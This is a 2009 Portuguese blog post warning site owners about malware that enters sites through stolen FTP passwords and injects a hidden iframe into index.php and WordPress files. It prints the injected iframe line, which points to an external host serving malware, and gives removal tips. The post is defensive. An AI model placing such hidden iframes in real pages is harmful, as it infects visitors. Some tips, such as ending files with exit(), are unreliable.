Criação e desenvolvimento Web

Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP.

Publicado em Programação Web por devinternet em 16/Julho. 2009

Vírus Iframe, um trojan hacker que infecta seu site, blog ou página pelo FTP. Uma linha de código dentro do html que carrega um vírus para o usuário, alguns anti-vírus conseguem detectar e apenas fecha a página, sem mostrar o conteúdo do site e ainda, sem matar o vírus.

Um novo vírus está se espalhando pela Internet, não por email como  antigamente’, mas sim pelo código-fonte dos sites da Web. Para descobrir se sua página tem esse vírus, clique em com o botão direito na página e vá em Exibir código fonte, aí dentro digite ctrl + f e busque por iframe. Se aparecer algo como este abaixo, parabéns, você é mais um contemplado nesta nova praga.

iframe src="http://untlexy.net/?click=A0A0A0" width=1 height=1 style="visibility:hidden;position:absolute">

Não vou elogiar a criatividade dos criadores de vírus, parece que só agora eles descobriram a tag Iframe. Este código traz uma Url qualquer, pode ser uma página dentro ou fora do servidor do site. Um elemento Html antes muito usado, está caindo da biblioteca dos programadores depois do Ajax. Este iframe usado de má fé, traz um código css dentro do atributo Style, que esconde o conteúdo, ou seja, não traz nenhuma modificação na parte visual do site infectado, e mesmo assim continua executando o conteudo do url, que é um script que tenta instalar um vírus na máquina do usuário.

Como remover este vírus:

  • abra os arquivos index.php em seu site e remova a linha com o código.
  • passe o antivírus em sua máquina
  • não salve as senhas nos programas de ftp, ex.: dreamweaver
  • use o código exit(); no final do arquivo php

Quando usamos o código exit(); no final do arquivo, impedimos que apareça a tag do vírus, mesmo que ele esteja dentro do código.

No WordPress ele infecta:

  • index.php
  • wp-admin/index.php
  • wp-content/themes/seutema/index.php
  • wp-content/themes/seutema/home.php

Encontrei pouca documentação interessante sobre isto, quase nada para ser sincero, acredito que ele rouba as senhas do blog, do ftp e ainda instala um trojan. Quem tem um bom antivírus não consegue vizualizar a página.

Caso tenha alguma dúvida ou sugestão comente abaixo.

Etiquetado como:, , ,

2 comentários